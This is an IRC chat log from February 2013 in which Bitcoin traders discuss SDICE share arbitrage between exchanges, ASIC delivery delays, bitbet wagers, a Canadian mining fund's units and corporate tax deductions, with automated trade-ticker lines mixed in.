20:52:00 but im not here 24/7, and often when the good arbitrage opportunities come up, you have to act quickly Feb 26 20:52:09 right Feb 26 20:52:48 several us have had urges to cream into your bids for sdice in recent weeks Feb 26 20:52:59 of Feb 26 20:53:42 yea, im amazed at the demand for sdice on havelock Feb 26 20:53:55 and it just keeps growing Feb 26 20:54:09 [MPEX] [S.DICE] 5000 @ 0.00635 = 31.75 BTC [+] Feb 26 20:54:51 [HAVELOCK] [SDICE] 8 @ 0.64 = 5.12 BTC [-] Feb 26 20:54:52 [HAVELOCK] [SDICE] 15 @ 0.639 = 9.585 BTC [-] Feb 26 20:54:54 [HAVELOCK] [SDICE] 13 @ 0.63200001 = 8.216 BTC [-] Feb 26 20:54:55 [HAVELOCK] [SDICE] 14 @ 0.632 = 8.848 BTC [-] Feb 26 20:55:08 would this be something that could be integrated with coinbr Feb 26 20:55:32 ^ there, i actually LOST bitcoins doing that arbigrage, just to move another 5000 shares to havelock Feb 26 20:55:52 but thats only beneficial for YOU ;) Feb 26 20:56:01 indeed :) Feb 26 20:56:23 1,050,000 SDICE shares now on havelock Feb 26 20:57:18 not sure about integrating with coinbr, anything is possible though Feb 26 20:57:32 if coinbr gives you PUSH receipts from mpex, then it would work Feb 26 21:01:43 coinbr does push completely manually, i can give you the receipt if needed Feb 26 21:03:22 do users get the receipt? Feb 26 21:03:33 yes if they ask Feb 26 21:04:06 well, let me get automatic mpex<-->havelock setup first, then lets talk about setting up coinbr<-->havelock :) Feb 26 21:04:17 anyway i did it only once so far... with your offering this may get requested more and be the impetus do do it better Feb 26 21:04:38 but i'm very wary of any automatic moving of stuff to/from mpex Feb 26 21:05:43 not easy to fix afterwards, you know Feb 26 21:06:48 you'll have to sue the proprieotr in his own court if you make an error Feb 26 21:07:20 heh yea Feb 26 21:07:24 if there's a know proprietor, ofc Feb 26 21:07:30 *known Feb 26 21:07:36 the 'automatic' is going to have a final approval button for me to click for the first little while Feb 26 21:07:37 just to make sure Feb 26 21:07:53 but realistically, it should work perfectly Feb 26 21:08:01 and im always in favour of automating things Feb 26 21:08:13 i like residual income, not income i have to work for! Feb 26 21:09:10 if there's only one fixed address involved it's doable Feb 26 21:09:39 but the thought of supporting automatic transfers to anywhere makes my hair stand up Feb 26 21:10:12 maybe i'll have to use extra account for that, move the user's stuff there Feb 26 21:10:32 and then in separate step move it out Feb 26 21:10:50 and accepting incoming transfers likewise on other direction Feb 26 21:15:59 so that neither coinbr's core addy gets known nor successful attack of frontend enable attacker to push stuff onto his account Feb 26 21:16:45 heh you must not trust your own security then :p Feb 26 21:17:15 i don't have to trust the filthy bitvps machine, that's all Feb 26 21:17:22 ah Feb 26 21:17:32 own all my physical servers Feb 26 21:17:38 and they're locked in my own cage at the data center Feb 26 21:17:58 i prefer to have frontend and backed physically separated Feb 26 21:18:32 i also expect ddos, it will make it handling easier if backend is completely elsewhere Feb 26 21:20:23 bootstrapping it completely, has to do things as lean as possible Feb 26 21:20:58 can't expect any investor in this situation "okay, now tell me more about this mircea popescu" lol Feb 26 21:23:25 even if i paint him in rosy colors, then they come around trilema blog and MPOE-PR haha Feb 26 21:25:05 whatever. i'm used to doing things in this fashion. Feb 26 21:25:15 alone Feb 26 21:26:28 jurov mircea_popescu will likely be your first big investor Feb 26 21:27:18 [BTCTC] [GSDPT] 7 @ 0.00636 = 0.0445 BTC [+] Feb 26 21:27:20 [BTCTC] [GSDPT] 93 @ 0.00636 = 0.5915 BTC [+] Feb 26 21:27:34 he is not interested in doing noob interface. Feb 26 21:27:46 maybe we can do some other project like he did with kakobrekla if i come around interesting idea Feb 26 21:28:26 bitbet is going to grow rather slow Feb 26 21:29:39 but hockey stick curve for bitbet is possible, if it becomes as popular as sdice Feb 26 21:30:23 i decided to dampen things in coinbr by asking monthly fee... after several months i can say i did it right Feb 26 21:30:54 the issues i had would be unsolvable with 10-100x higher volume Feb 26 21:31:20 ;;bc,stats Feb 26 21:31:22 Current Blocks: 223259 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 516 blocks | Next Difficulty In About: 3 days, 2 hours, 9 minutes, and 20 seconds | Next Difficulty Estimate: 4336419.58974 | Estimated Percent Change: 18.7731 Feb 26 21:31:23 ,,bc,stats Feb 26 21:31:25 bleh Feb 26 21:37:36 !ticker h sdice Feb 26 21:37:38 [HAVELOCK:SDICE] 1D: 0.63000000 / 0.6383501 / 0.68000000 (240 shares, 153.20402432 BTC), 7D: 0.60000000 / 0.65789684 / 0.74399999 (1300 shares, 855.26589784 BTC), 30D: 0.52100000 / 0.6659979 / 0.89000000 (11030 shares, 7345.95684524 BTC) Feb 26 21:40:20 ;;calc 4336419 * 1.5 Feb 26 21:40:20 6504628.5 Feb 26 21:41:12 how likely is the diff to go up by 50% around March 14? Feb 26 21:42:10 with no signs of fpga progress... maybe i can sell some more iDiff-Os at 0.07 Feb 26 21:43:13 looking less and less likely Feb 26 21:43:41 not one asic provider is meeting their projections Feb 26 21:46:16 [BTCTC] [GOLD] 1 @ 0.5008 BTC [-] Feb 26 21:49:23 ;;ticker Feb 26 21:49:24 BTCUSD ticker | Best bid: 30.96001, Best ask: 30.99000, Bid-ask spread: 0.02999, Last trade: 30.88007, 24 hour volume: 42692.62675683, 24 hour low: 30.11000, 24 hour high: 31.69900, 24 hour vwap: 30.92679 Feb 26 21:49:35 I bet BFL won't ship until the end of march Feb 26 21:49:59 end of april, if at all Feb 26 21:57:56 [BTCTC] [BTC-BOND] 10 @ 0.00991 = 0.0991 BTC [-] Feb 26 21:57:58 [BTCTC] [BTC-BOND] 38 @ 0.0099 = 0.3762 BTC [-] Feb 26 22:21:48 [MPEX] [S.MPOE] 2800 @ 0.00076 = 2.128 BTC [-] Feb 26 22:26:49 ;;slap balls Feb 26 22:27:02 yikes Feb 26 22:27:24 7.62x39 to the ball bag != good day Feb 26 22:27:42 nope. i just want to go home. Feb 26 22:27:54 fucking jobs and the money they pay me. Feb 26 22:27:57 jerks Feb 26 22:28:54 ahh werd Feb 26 22:41:51 [HAVELOCK] [KCIM] 10 @ 1 = 10 BTC [+] Feb 26 22:44:09 sup bitches' Feb 26 22:44:43 ;;slap balls Feb 26 22:44:51 ballsacks Feb 26 22:44:52 that's what Feb 26 22:45:04 sup witch u kako? Feb 26 22:45:11 mah brudda?!?! Feb 26 22:45:31 :D Feb 26 22:45:33 srsly, I just don't give a fuck about working anymore. Feb 26 22:45:42 i gotta get out of here. Feb 26 22:45:57 all good, been a long day which is just about to start really Feb 26 22:46:02 yes, stop wroking. Feb 26 22:46:06 working Feb 26 22:46:13 its silly! Feb 26 22:47:30 bugpowder, you're here! and kakobrekla ! you can watch my apathy grow! Feb 26 22:47:45 show us what u got Feb 26 22:47:48 it's thiiiiiiiiiiiiiiiiis big. Feb 26 22:48:00 1 million strong, and groooooowing Feb 26 22:49:07 i'm closing this ssh session. these people want to offer me a permament position, I should pretend to work the last 10 minutes i'm here. Feb 26 22:49:10 adios Feb 26 22:49:45 doing things over ssh = not working? strange Feb 26 22:51:16 huh? Feb 26 22:52:02 The reddit wankers are getting more pathetic by the day. http://www.reddit.com/r/Bitcoin/comments/199vvi/bitcoins_and_how_they_changed_my_life/ Feb 26 22:52:51 [HAVELOCK] [HIM] 1 @ 17.5 BTC [+] Feb 26 22:52:57 "At this point, bitcoins could go to $0 without any regrets" I seriously doubt that this statement is true. Feb 26 22:53:49 don't forget the $1000 ripples Feb 26 22:54:03 i seriously expected mention of silkroad/satoshidice Feb 26 22:54:11 or whatever XBC is Feb 26 22:54:37 OMG dub R U SELLING XBC??????!?!?!?! Feb 26 22:54:45 what is xbc Feb 26 22:54:50 shrug Feb 26 22:54:52 and yes I am selling it Feb 26 22:54:58 schweet Feb 26 22:55:00 me too 50K Feb 26 22:55:10 100btc each you send first Feb 26 22:55:11 for 50K s.dice Feb 26 22:55:13 can iripple with it? Feb 26 23:05:22 jesus, HIM trading at 17.50 BTC Feb 26 23:05:43 what is HIM Feb 26 23:05:44 thats over $500/share Feb 26 23:05:53 https://www.havelockinvestments.com/fund.php?symbol=HIM Feb 26 23:06:03 good thing we're doing the 1:10 stock split on friday Feb 26 23:06:07 bring things back to a normal level Feb 26 23:06:09 eww worldwidewebternet Feb 26 23:06:13 I prefer not to Feb 26 23:06:16 we're the berkshire hathaway of bitcon investmetns right now Feb 26 23:10:39 Bugpowdr: personally I wouldn't mind that much right if BTC went to zero and died. Feb 26 23:12:21 topace berkshire hathaway? bold claim Feb 26 23:12:54 also if you were truly B-H you wouldnt split the stock Feb 26 23:15:06 what's the rough hashrate/share right now on HIM? Feb 26 23:17:15 thestringpuller: just from a high price perspective at least. not referring at all to possible returns Feb 26 23:17:30 not many people are willing to drop $500+ on a single unit of an investment Feb 26 23:17:48 yea, we dont want to be b-h :) we want market liquidity Feb 26 23:18:10 and that only comes at this point with either a) millionaires, or b) lower per-unit price Feb 26 23:18:18 burnside: about 25GH Feb 26 23:18:51 [HAVELOCK] [HIM] 1 @ 17 BTC [-] Feb 26 23:18:57 err actually, ~23GH, we shut off a a few of the old GPU machines, only FPGA's are running now Feb 26 23:19:08 keep talking maybe someone will buy another Feb 26 23:19:15 ahaha apparently Feb 26 23:19:19 :) Feb 26 23:19:36 25GH.. per share? Feb 26 23:19:47 nonono Feb 26 23:19:58 25GH total. How many shared? Feb 26 23:20:01 er.. shares? Feb 26 23:20:12 https://www.havelockinvestments.com/fund.php?symbol=HIM Feb 26 23:20:14 Are they ownership stakes in the mining equipment? Feb 26 23:20:19 yes Feb 26 23:20:29 a share is its percent of the total ownership of the compnay Feb 26 23:20:37 400 shares Feb 26 23:20:40 on friday it'll be 4000 Feb 26 23:20:59 Oh, they're actual shares in a company..? Feb 26 23:21:09 Are the articles of incorporation available somewhere? Feb 26 23:22:16 aaargh there's an sdice passthrough. lol Feb 26 23:22:54 topace: Hey if they're ownership stakes does that mean we can trade the shares in for shipped fpga units? Feb 26 23:23:22 they arent shares, they are units :) Feb 26 23:23:51 and no, you cant trade a unit in for a shipped fpga Feb 26 23:25:03 topace: What FPGAs are you running? ztex? Feb 26 23:25:04 Namworld_afk: you buy puts again? Feb 26 23:25:21 bfl Feb 26 23:25:58 and have pre-orders in for asic upgrades on every fpga already (since july/august).. if bfl ever ships, lol Feb 26 23:26:24 the delays all the asic producers have had have been great for the fund though, much better return on the FPGAs Feb 26 23:26:52 https://www.ic.gc.ca/app/scr/cc/CorporationsCanada/fdrlCrpDtls.html?corpId=8159181&V_TOKEN=1361913886449&crpNm=8159181&crpNmbr=&bsNmbr= Feb 26 23:26:59 not sure if that'll work, ight have the session in it... Feb 26 23:30:17 it works. That's the corporation? Feb 26 23:30:57 Are the articles of incorporation somewhere on that page, or are they elsewhere? Feb 26 23:31:27 good heravens, if that's you, you're federally incorporated dude. Feb 26 23:32:02 federation of moosecock? Feb 26 23:35:10 dub: how droll Feb 26 23:39:06 [MPEX] [S.MPOE] 10000 @ 0.00074744 = 7.4744 BTC [-] Feb 26 23:39:08 [MPEX] [S.MPOE] 2015 @ 0.00074743 = 1.5061 BTC [-] Feb 26 23:40:21 topace, thanks, that's pretty good. Feb 26 23:42:41 [MPEX] [O.BTCUSD.C310T] 8 @ 0.17554903 = 1.4044 BTC [-] Feb 26 23:48:11 yea Feb 26 23:48:18 we're federally incorporated Feb 26 23:54:09 it costs $200 and takes 15 minutes online to get a federal corporation Feb 26 23:54:12 in canada Feb 26 23:54:41 with it comes a lot of reporting requirements of course, and those are LEGAL requirements Feb 26 23:54:53 so its easy to get, but not easy to do all the things you have to do once you have it Feb 26 23:56:51 [HAVELOCK] [HIM] 1 @ 18 BTC [+] Feb 27 00:08:14 !ticker h HIM Feb 27 00:08:16 [HAVELOCK:HIM] 1D: 15.90000000 / 16.815 / 18.00000000 (10 shares, 168.15000000 BTC), 7D: 14.91990000 / 16.12499375 / 18.00000000 (16 shares, 257.99990000 BTC), 30D: 12.12000000 / 14.46514286 / 18.00000000 (49 shares, 708.79200000 BTC) Feb 27 00:08:31 hmm Feb 27 00:11:20 big brother's watching: http://otc.armed.us/otc Feb 27 00:11:56 http://otc.armed.us/otc/?mircea_popescu lol he got kicked repeatedly Feb 27 00:11:57 midnightmagic: I didn't realise canada was a federation Feb 27 00:13:15 he was kicked thrice Feb 27 00:13:23 and the PREV_NICK: entries are lulzy Feb 27 00:26:51 wee Feb 27 00:28:57 http://www.theverge.com/2013/2/26/4031938/new-crowdfunding-platforms-let-you-sell-stock-in-yourself Feb 27 00:30:39 hey im a bitcoiner, invest in me Feb 27 00:30:43 lol Feb 27 00:32:30 "OptionsCover":[{"":{"MPSIC":"O.BTCUSD.C160T", "Quantity":"1", "TotalSum":"100000000"}}, Feb 27 00:32:32 {"":{"MPSIC":"O.BTCUSD.P160T", "Quantity":"1", "TotalSum":"100000000"}}, Feb 27 00:32:41 ^ now that's a lulzy format Feb 27 00:33:11 if bfl will ship march 9th... then Feb 27 00:33:23 it will pretty much match avalon 2's shipment date Feb 27 00:33:38 do the avalons work? Feb 27 00:34:04 i'm concerned only about difficulty increas, that shoudl happen around March 14... and it won't be affected much Feb 27 00:35:51 [HAVELOCK] [SDICE] 8 @ 0.683 = 5.464 BTC [+] Feb 27 00:35:53 [HAVELOCK] [SDICE] 5 @ 0.6839 = 3.4195 BTC [+] Feb 27 00:35:55 the ones we've seen works, yea Feb 27 00:36:11 more than 2 or 3? Feb 27 00:36:18 yes Feb 27 00:36:24 in china at least Feb 27 00:36:41 2 in NA, at lease 3 in china, and the rest are being hush hush Feb 27 00:37:00 so 2 Feb 27 00:37:51 [HAVELOCK] [SDICE] 8 @ 0.683 = 5.464 BTC [-] Feb 27 00:38:57 hardly confidence inspiring Feb 27 00:45:02 https://bitcointalk.org/index.php?topic=147139.msg1562492#msg1562492 Feb 27 00:45:03 lulz Feb 27 00:46:07 wow Feb 27 00:46:19 i would be surprised if it really was down perm Feb 27 00:46:24 it's been around for a long time Feb 27 00:46:50 luckily no coins pending on it Feb 27 00:47:02 mhm.. sucks for those with 2-3 year bets Feb 27 00:47:04 lol Feb 27 00:47:08 A strong argument against betting on an even that is more than a few months out Feb 27 00:47:12 i never saw a bet worth registering for Feb 27 00:47:14 exactly Bowjob Feb 27 00:47:17 on that site Feb 27 00:47:30 I liked the SHA-3 bets Feb 27 00:47:41 easy money Feb 27 00:47:49 someone bet emotionally on them Feb 27 00:47:49 what were they? Feb 27 00:48:12 "Server is down for maintenance. We'll be back in a couple of hours." Feb 27 00:48:18 there we go Feb 27 00:48:21 Which hash will become sha-3 Feb 27 00:48:33 someone bet like 50BTC on one Feb 27 00:48:40 huh Feb 27 00:48:41 and quite a bit against on several others Feb 27 00:48:56 So I just bet against the pro one and for all the others Feb 27 00:49:05 was not disappoint with the results Feb 27 00:49:09 :) Feb 27 00:49:25 Also the Ron Paul bets were awesome Feb 27 00:49:33 betting against paultards Feb 27 00:49:54 Ron Paul to become president. Yeah I'll bet 50BTC against that and take your money thank you Feb 27 00:50:02 lol Feb 27 00:51:00 who's next president ? Feb 27 00:51:21 *next candidate Feb 27 00:51:22 sarah palin Feb 27 00:51:34 +1 Feb 27 00:52:09 probably Hu Jintao tbh Feb 27 00:52:14 the real face of amurica Feb 27 00:53:15 maybe if they had a bet about betofbitco.in ceases operation in 2013....oh nvm Feb 27 00:53:51 we'll say the same thing about mpex one day Feb 27 00:53:55 nice toshop job ! Hu Jintao at the oval office Feb 27 00:54:05 jurov: to bitbet! Feb 27 00:54:24 "remember when you could buy shares of mpoe on mpex? boy was that stupid" Feb 27 00:54:28 I wanted to see an apocalypse bet Feb 27 00:54:38 what to bitbet? should we put that bet on bitbet? Feb 27 00:54:53 yea.. and i was ..like.. a broker, hahahaha Feb 27 00:55:05 boy was that jurov guy stupid Feb 27 00:55:26 :) Feb 27 00:55:48 even if it crashed tomorrow i can say i was living 2 months off it Feb 27 00:56:03 not bad, don't you tihnk? Feb 27 00:56:20 im worse Feb 27 00:56:24 1year+ Feb 27 00:56:49 so, you're even more stupid then :D Feb 27 00:56:53 yes Feb 27 00:56:58 total retard. Feb 27 00:57:07 *highfive* Feb 27 00:57:22 im so stupid i dunno how to do dat Feb 27 00:57:38 *kakobrekla tries and misses Feb 27 00:57:46 darn Feb 27 00:57:49 better go practice Feb 27 00:58:26 living off of what? Feb 27 00:58:38 coins Feb 27 00:58:40 coinbr+mpex daytrading Feb 27 00:58:49 +bitfunder shenanigans Feb 27 00:59:03 oh... what's wrong with that? Feb 27 00:59:11 eating the seed corn Feb 27 00:59:18 i bought a car with em with btc was liek 5 euro Feb 27 00:59:18 of the financial revolution Feb 27 00:59:34 prolly im as dumb as 10k pizza guy Feb 27 00:59:44 this is the main problem with plan Tesla Feb 27 00:59:46 dude was not dumb, he got a pizza Feb 27 01:00:19 I want to like sell maybe 10% of my coins for a Tesla. Feb 27 01:00:29 he helped kickstart a revolution, he got a pizza and he didn't have to kill anyone Feb 27 01:00:44 Which is going to take quite a bit more rise in value Feb 27 01:00:54 he helped himself get poor Feb 27 01:00:58 thats the only thing he did Feb 27 01:01:00 since revolutions tend to eat its children... better eat the seeds. Feb 27 01:01:16 How many coins did he still have after the pizza? Feb 27 01:01:26 at least 50k Feb 27 01:01:30 depends if he did reorder Feb 27 01:01:33 I think he is doing ok Feb 27 01:01:57 the guy that sold the pizza though... He is the true visionary Feb 27 01:02:27 papa john's sold the pizza Feb 27 01:02:53 they are ok Feb 27 01:03:49 and he did reorder Feb 27 01:06:08 heheh Feb 27 01:06:11 50k? Feb 27 01:06:18 thats a number pulled out of ur ass or? Feb 27 01:08:50 [HAVELOCK] [SDICE] 2 @ 0.6829 = 1.3658 BTC [-] Feb 27 01:12:39 ;;ticker Feb 27 01:12:40 BTCUSD ticker | Best bid: 31.17999, Best ask: 31.18000, Bid-ask spread: 0.00001, Last trade: 31.17999, 24 hour volume: 42869.02144537, 24 hour low: 30.11110, 24 hour high: 31.69900, 24 hour vwap: 30.99536 Feb 27 01:12:50 crash! Feb 27 01:13:34 interesting, CoinBr.iDiff-E (expires April 17) sells quite well for 0.095 ... asics hope dies last, seems. Feb 27 01:14:20 no, from the screenshoot of the guy wallet when he send the 10k Feb 27 01:14:51 i dont think there will be any majorish price increase until there is majorish difficulty increase Feb 27 01:14:57 meaning some one else has to deliver Feb 27 01:15:00 http://smpake.com/etc/btc/charts.php Feb 27 01:15:22 my guess it it will stabilize around 0.15 eur per 100mhash daily or lower Feb 27 01:15:24 with asics Feb 27 01:15:37 maybe 0.1 Feb 27 01:16:01 [BTCTC] [GSDPT] 100 @ 0.00636 = 0.636 BTC [+] Feb 27 01:23:12 anywho Feb 27 01:23:28 according to that chart bubble starts at ~40 to 45 usds at this diff Feb 27 01:26:10 [BTCTC] [GSDPT] 2 @ 0.00636 = 0.0127 BTC [+] Feb 27 01:35:55 sooo Feb 27 01:37:18 topace it's a good thing to have anyway. Feb 27 01:45:39 more than 2 or 3? << supposedly some chinese ppl got delivered. it's vague. Feb 27 01:47:55 "China customs just discovered Bitcoins and are mining like there's no tomorrow..." Feb 27 01:47:59 Uh oh Feb 27 01:48:47 depends if he did reorder << haha good 1. Feb 27 01:49:01 or all rigs were "harmonized" by The Party Feb 27 01:49:29 re bubble talk allow me to shamelessly plug http://trilema.com/2013/permanently-elevated-plateau/ Feb 27 01:52:01 "China customs just discovered Bitcoins and are mining like there's no tomorrow..." Feb 27 01:52:17 " onryo : Bowjob for real?" Feb 27 01:52:20 xD Feb 27 01:52:34 over at Bfl shoutbox Feb 27 01:52:52 luck this isnt bfl shoutbox ... OR IS IT? Feb 27 01:52:57 lucky* Feb 27 01:53:16 unless its inaba crying i dun wanna hear it Feb 27 01:54:38 so did they get bumped yet ? Feb 27 01:54:49 no Feb 27 01:54:58 shocking. Feb 27 01:55:01 march 9th is the new target date Feb 27 01:55:08 https://bitcointalk.org/index.php?topic=101902.msg1560469#msg1560469 Feb 27 01:55:09 lol drama Feb 27 01:55:16 may as well make another BFL bet that they wont ship by march 30th Feb 27 01:55:22 Bowjob this reminds me of george costanza getting married. Feb 27 01:55:29 its already up Feb 27 01:55:34 i think Feb 27 01:55:34 is ti? Feb 27 01:55:35 lol Feb 27 01:55:53 ah, its the 15th Feb 27 01:55:53 http://bitbet.us/bet/261/bfl-will-deliver-asic-devices-before-march-15th/ Feb 27 01:55:55 this time Feb 27 01:56:09 too easy Feb 27 01:56:18 should be the end of the month Feb 27 01:56:23 to make it fun Feb 27 01:56:23 ya srsly. Feb 27 01:56:42 do something!! Feb 27 01:57:37 mircea_popescu: anything said to have happened in china carries much lower weighting in the dubwot Feb 27 01:57:59 i wonder why. Feb 27 01:58:19 didnt bfl already say by march ? Feb 27 01:58:32 2012? Feb 27 01:58:36 lol Feb 27 01:58:37 bfl have said a great number of things Feb 27 01:58:44 tis true Feb 27 01:59:34 Ukto as best we can determine bfl bet 500 btc they'll deliver by march 1st Feb 27 01:59:38 back in early january Feb 27 01:59:50 [HAVELOCK] [SDICE] 7 @ 0.679 = 4.753 BTC [-] Feb 27 02:01:24 so two days into the new month mpoe saw like 20k volume Feb 27 02:01:34 this has all the makings of yet another record month Feb 27 02:05:19 :D Feb 27 02:05:28 bfl bet 500btc? Feb 27 02:05:42 i think so. Feb 27 02:06:24 no worries it was all extra scratch left over from BTC returns Feb 27 02:07:20 possibly ya Feb 27 02:12:01 josh said he didnt put money on the bet Feb 27 02:12:02 mhm Feb 27 02:12:44 well, the bet popped, then it was discussed on the forum then the bet showed up. who knows, maybe it's some other true believer. Feb 27 02:12:56 sure looked suspicious tho Feb 27 02:14:14 reasonably, a third party with 500 btc to ride on "bfl delivers" would have spent it to pre-order rather than to bet Feb 27 02:14:20 then again, reasonably is overrated. Feb 27 02:17:55 resonably, true believers should buy difficulty futures Feb 27 02:18:36 some do but not many, i feared with prices i'm offering i'll have to think hard about collateral requirement Feb 27 02:18:51 [HAVELOCK] [SDICE] 20 @ 0.679 = 13.58 BTC [-] Feb 27 02:19:05 yea. lots of stuff to learn for many people yet. Feb 27 02:23:24 [MPEX] [S.MPOE] 9900 @ 0.00075894 = 7.5135 BTC [+] Feb 27 02:26:18 [BTCTC] [BITVPS] 1 @ 0.00424 BTC [-] Feb 27 02:27:27 http://www.lawgazette.co.uk/inpractice/qa/limit-cash-payments-clients Feb 27 02:27:31 this shit is fucking insane. Feb 27 02:27:50 it is not nor can it be the business of a solicitor to inquire as to where money comes from for fucks sake. Feb 27 02:28:23 how long till people start coming to their senses ? "i am not the police and i do not do the job of the police. do your motherfucking jobs!" Feb 27 02:38:35 hello Feb 27 02:39:46 [BTCTC] [B.YABMC] 1 @ 0.00897 BTC [+] Feb 27 02:39:48 [BTCTC] [B.YABMC] 15 @ 0.00897 = 0.1346 BTC [+] Feb 27 02:40:57 hi Feb 27 02:43:02 when you think the next crash will be? Feb 27 02:43:13 3 Feb 27 02:43:14 2 Feb 27 02:43:15 1 Feb 27 02:43:17 now. Feb 27 02:44:08 ;;ticker Feb 27 02:44:09 BTCUSD ticker | Best bid: 31.08556, Best ask: 31.12000, Bid-ask spread: 0.03444, Last trade: 31.12000, 24 hour volume: 42956.19105260, 24 hour low: 30.11710, 24 hour high: 31.69900, 24 hour vwap: 31.01976 Feb 27 02:44:18 its really gonna be now at some point of time. Feb 27 02:44:18 the next crash will be after bitcoin touches 100 Feb 27 02:45:05 reminds me of the time argument Feb 27 02:45:06 http://www.youtube.com/watch?v=36SQTFIAZKU Feb 27 02:45:40 it's kinda funny to me tho, all the smartasses that were explaining how bitcoin is no good feel a little left out now Feb 27 02:45:46 hoping for a crash Feb 27 02:45:59 well... it's going to crash, but later on, and it won't crash as low as 30, so... Feb 27 02:46:22 your basis for this is? Feb 27 02:46:35 this. Feb 27 02:46:49 not that! Feb 27 02:46:54 kay Feb 27 02:47:18 we all just speculatin' Feb 27 02:47:46 but you have decided that the floor is now 30? Feb 27 02:47:47 its gonna crash upwards Feb 27 02:47:49 haha Feb 27 02:47:58 seems pretty clear to me, yes. floor is now 30. Feb 27 02:48:38 my floor is carpet Feb 27 02:48:50 My floor is tile. Feb 27 02:48:54 think about it. everyone that wanted to sell at 30 could have. there's no pressure tho. Feb 27 02:49:05 so logically, nobody wants to sell at 30 Feb 27 02:49:12 this simply means people wanting in will have to pay more. Feb 27 02:49:25 and they should be thankful for anything they get. it's early yet. Feb 27 02:49:34 http://www.nj.com/politics/index.ssf/2013/02/nj_legislature_approves_of_chr.html Feb 27 02:49:47 NJ joined the online gambling parade Feb 27 02:50:07 ThickAsThieves they won't beat nevada tho Feb 27 02:50:34 nope Feb 27 02:51:27 mircea_popescu: I still think we might see people cashing in USD, perhaps ASIC manufacturers for their day-to-day operations. Feb 27 02:52:01 they don't have day to day operations Feb 27 02:52:02 didnt that happen at like $24 or so? Feb 27 02:52:03 Eduard_Munteanu sure, some btc will always be on offer. Feb 27 02:52:22 but the buyers wave is steady Feb 27 02:52:24 amazingly Feb 27 02:52:46 Yeah, I'm pretty amazed it didn't crash. Might be relatively stable after all. Feb 27 02:52:47 moreover, good/bad money theory. Feb 27 02:52:52 everyone tends to spend btc last. Feb 27 02:53:10 the miners that saved their mined btc made a killing this year, for instance Feb 27 02:53:14 Hm, good point. Feb 27 02:53:20 this lesson has not been lost on anyone i've talked to. Feb 27 02:53:50 there's also the fiscal consideration. spend fiat, it counts as a deduction. Feb 27 02:53:50 Did you get a miner btw? I'm a bit sorry I'm late to the party. :( Feb 27 02:53:59 nah, im not into mining. Feb 27 02:54:58 Initially it seemed like a good deal, I probably would've bought a ~ $1500 miner. I'm interested to see how much they manage to get out of it. Feb 27 02:55:02 how do you mark buying BTC as a deduction? Feb 27 02:55:22 ThickAsThieves the fiat you spend to pay for fixed costs is a deduction. Feb 27 02:55:43 like a tax deduction? Feb 27 02:55:47 yes like a tax deduction. Feb 27 02:56:05 what fixed cost would it be best categorized as Feb 27 02:56:10 I wonder if you could deduct buying BTCs here. Feb 27 02:56:17 Eduard_Munteanu pretty sure you couldn't. Feb 27 02:56:33 ThickAsThieves company A spends 50, makes 70, pays tax on the 20. Feb 27 02:56:45 if next year company A spends 55, makes the same 70, it pays tax on the 15 only Feb 27 02:56:58 if the extra 5 pays electricity for a rig that makes no difference in this equation. Feb 27 02:57:09 incidentally every dime i've spent on bitcoin has come froma company account Feb 27 02:57:09 Actually yeah, you probably can't, not to mention you need receipts and such. Feb 27 02:57:32 you can get receipts from bitstamp or smth Feb 27 02:58:05 i know some guy that charged all his game subscription to company Feb 27 02:58:17 got audited, he claimed it's for employee's productivity Feb 27 02:58:21 they disallowed like half Feb 27 02:58:27 hehe Feb 27 02:58:45 so would i call it an investment? Or what kind of expense? Feb 27 02:58:46 apparently wow is not ok but some cs-thing is or something like that. he had a list. Feb 27 02:59:09 ThickAsThieves you wouldn't call it anything. when power bill comes you just pay it and that's that. Feb 27 02:59:19 but on your taxes Feb 27 02:59:23 that goes under utilities Feb 27 02:59:26 not on YOUR taxes. Feb 27 02:59:33 this is corporate tax we're discussing here. Feb 27 02:59:48 mircea_popescu: I wonder if BTC is a good way to get money *out* of the company's accounts Feb 27 02:59:57 Deductible or not. Feb 27 03:00:22 get it out of the country then handle it Feb 27 03:00:27 if it's your company you can do whatever you want. Feb 27 03:00:30 fucking US taxes Feb 27 03:00:32 so it's just like any other vendor expense or such Feb 27 03:00:35 you can make a company to warm the atmosphere if you please. Feb 27 03:00:54 this is kinda scary Feb 27 03:00:57 mircea_popescu: AFAIK it's a pain to justify taking money out of your accounts Feb 27 03:01:12 I've seen people complain about it. Feb 27 03:01:17 what dopes that even mean ? Feb 27 03:01:21 I'm sure there are ways around it though. Feb 27 03:01:33 i never heard of such a problem. Feb 27 03:01:39 not in US Feb 27 03:01:48 take money out for whatever whenever Feb 27 03:01:53 mircea_popescu: stuff like "I can't pay you cash, I don't have it" Feb 27 03:02:01 ya well that's called being bankrupt. Feb 27 03:02:32 we're talking actual corps here, not the living dead. Feb 27 03:02:35 I still assumed people were stubborn about it, so yeah, you're probably right. Feb 27 03:02:55 that's the definition. unable to pay exigible demands => bankrupt. Feb 27 03:03:35 mircea_popescu: say a company wants to employ a sizeable portion of its workers under the table, that's the sort of scenario I have in mind Feb 27 03:03:48 that'd be fraud now wouldn't it. Feb 27 03:04:26 so you do all your btc/fiat transactions above board? Feb 27 03:04:40 i know youll only give one answer i guess Feb 27 03:04:45 mircea_popescu: I think so... hypothetically. :) Feb 27 03:04:51 ThickAsThieves what transactions tho ?! Feb 27 03:04:58 indeed Feb 27 03:05:04 if you stay in BTC Feb 27 03:05:08 and spend BTC Feb 27 03:05:10 i've bought plenty on my own account, as any other game subscription./currency/whatever Feb 27 03:05:14 nothing to note Feb 27 03:05:24 i've not sold other than negligible amts Feb 27 03:05:31 and if i do sell sure it'll be reported as revenue Feb 27 03:05:56 ah damn.. it was nice while it worked Feb 27 03:05:56 lol Feb 27 03:05:59 surely most people wouldnt Feb 27 03:06:03 Eduard_Munteanu ya well, that has little to do with btc. you can use goats or salt to commit fraud. Feb 27 03:06:06 that XRP giveaway, they sent me 50k twice Feb 27 03:06:15 ThickAsThieves why not ?! Feb 27 03:06:23 Hm, fair point. Feb 27 03:06:30 report income from BTC? Feb 27 03:06:36 yes Feb 27 03:06:58 when the cats away Feb 27 03:07:19 makes no sense. in a properly structured vehicle you pay whatever, 3% if anthing at all Feb 27 03:07:20 i know most americans would default to that attitude Feb 27 03:07:25 Well sure, now you don't expect a company owner to admit, no? Hypothetically, of course. :) Feb 27 03:07:41 dudes, srsly. you're thinking like poor hicks in arkansas or some shit. Feb 27 03:07:55 more middle class and down Feb 27 03:08:00 the entire tax system is there to help. hire good fiscal representation and use it. Feb 27 03:08:00 a lot of people Feb 27 03:08:13 i dont disagree Feb 27 